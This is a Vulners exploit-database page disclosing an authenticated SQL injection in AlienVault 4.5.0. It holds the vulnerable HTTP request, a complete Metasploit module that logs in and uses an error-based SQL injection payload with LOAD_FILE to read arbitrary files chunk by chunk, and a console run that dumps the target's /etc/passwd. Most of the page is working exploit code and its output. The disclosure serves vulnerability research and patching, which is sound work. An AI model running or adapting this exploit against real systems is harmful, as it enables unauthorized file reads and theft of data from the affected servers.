Vulners
Lucene search
AlienVault 4.5.0 SQL Injection
`The following request is vulnerable to a SQL injection attack from authenticated users.
GET /ossim/report/BusinessAndComplianceISOPCI/ISO27001Bar1.php?date_from=2014-02-28&date_to=2014-03-30 HTTP/1.1
Host: 172.31.16.150
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://172.31.16.150/ossim/report/wizard_run.php?run=ZmRzYWZkc2EjIyNhZG1pbg==
Cookie: PHPSESSID=jllhuhmphk6ma5q8q2i0hm0mr1;
Connection: keep-alive
------------------------------------------------------------------------------------------------
The following metasploit module will exploit this in order to read a file off of the file system:
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault 4.5.0 authenticated SQL injection arbitrary file read",
'Description' => %q{
AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG
generation PHP file. This module exploits this to read an arbitrary file from
the file system. Any authed user should be usable. Admin not required.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
],
'References' =>
[
],
'Platform' => ['linux'],
'Privileged' => false,
'DisclosureDate' => "Mar 30 2014"))
register_options(
[
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),
OptString.new('USERNAME', [ true, 'Single username', 'username']),
OptString.new('PASSWORD', [ true, 'Single password', 'password']),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/'])
], self.class)
end
def run
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
})
cookie = res.get_cookies
post = {
'embed' => '',
'bookmark_string' => '',
'user' => datastore['USERNAME'],
'passu' => datastore['PASSWORD'],
'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})
if res.headers['Location'] != '/ossim/'
fail_with('Authentication failed')
end
cookie = res.get_cookies
done = false
i = 0
full = ''
while !done
pay = "2014-02-28' AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x7175777471,"
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x2f6574632f706173737764)) AS CHAR),"
pay << "0x20)),#{(50*i)+1},50)),0x7169716d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << " GROUP BY x)a) AND 'xnDa'='xnDa"
get = {
'date_from' => pay,
'date_to' => '2014-03-30'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'report', 'BusinessAndComplianceISOPCI', 'ISO27001Bar1.php'),
'cookie' => cookie,
'vars_get' => get
})
file = /quwtq(.*)qiqmq/.match(res.body)
file = file[1]
if file == ''
done = true
end
str = [file].pack("H*")
full << str
vprint_status(str)
i = i+1
end
path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
print_good("File stored at path: " + path)
end
end
-----------------------------------------------------------------------------
Quick run of the module:
msf auxiliary(alienvault_isp27001_sqli) > show options
Module options (auxiliary/gather/alienvault_isp27001_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH /etc/passwd yes Path to remote file
PASSWORD password yes Single password
Proxies no Use a proxy chain
RHOST 172.31.16.150 yes The target address
RPORT 443 yes The target port
TARGETURI / yes Relative URI of installation
USERNAME username yes Single username
VHOST no HTTP server virtual host
msf auxiliary(alienvault_isp27001_sqli) > run
[+] File stored at path: /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
[*] Auxiliary module execution completed
80922_default_172.31.16.150_alienvault.file_049766.txterry/.msf4/loot/201403300
[*] exec: cat /home/bperry/.msf4/loot/20140330080922_default_172.31.16.150_alienvault.file_049766.txt
root:x:0:0:root:/root:/usr/bin/llshell
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
munin:x:102:104::/var/lib/munin:/bin/false
postfix:x:103:106::/var/spool/postfix:/bin/false
snmp:x:104:108::/var/lib/snmp:/bin/false
hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
ossec:x:1000:1000::/var/ossec/:/bin/false
ossecm:x:1001:1000::/var/ossec/:/bin/false
ossecr:x:1002:1000::/var/ossec/:/bin/false
ntop:x:106:111::/var/lib/ntop:/bin/false
snort:x:107:112:Snort IDS:/var/log/snort:/bin/false
prads:x:108:113::/home/prads:/bin/false
nagios:x:109:114::/var/lib/nagios:/bin/false
mysql:x:110:115:MySQL Server,,,:/var/lib/mysql:/bin/false
asec:x:111:116:Alienvault smart event system user,,,:/var/lib/asec:/bin/false
mongodb:x:112:65534::/home/mongodb:/bin/false
avserver:x:113:121:AlienVault SIEM,,,:/home/avserver:/bin/false
avidm:x:114:121:AlienVault IDM,,,:/home/avidm:/bin/false
stunnel4:x:115:122::/var/run/stunnel4:/bin/false
avagent:x:116:121:AlienVault Agent,,,:/home/avagent:/bin/false
avapi:x:117:121:AlienVault SIEM,,,:/home/avapi:/bin/bash
rabbitmq:x:118:123:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false
avforw:x:119:121:AlienVault SIEM,,,:/home/avforw:/bin/false
msf auxiliary(alienvault_isp27001_sqli) >
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Mar 2014 00:00Current
0.6Low risk
Vulners AI Score0.6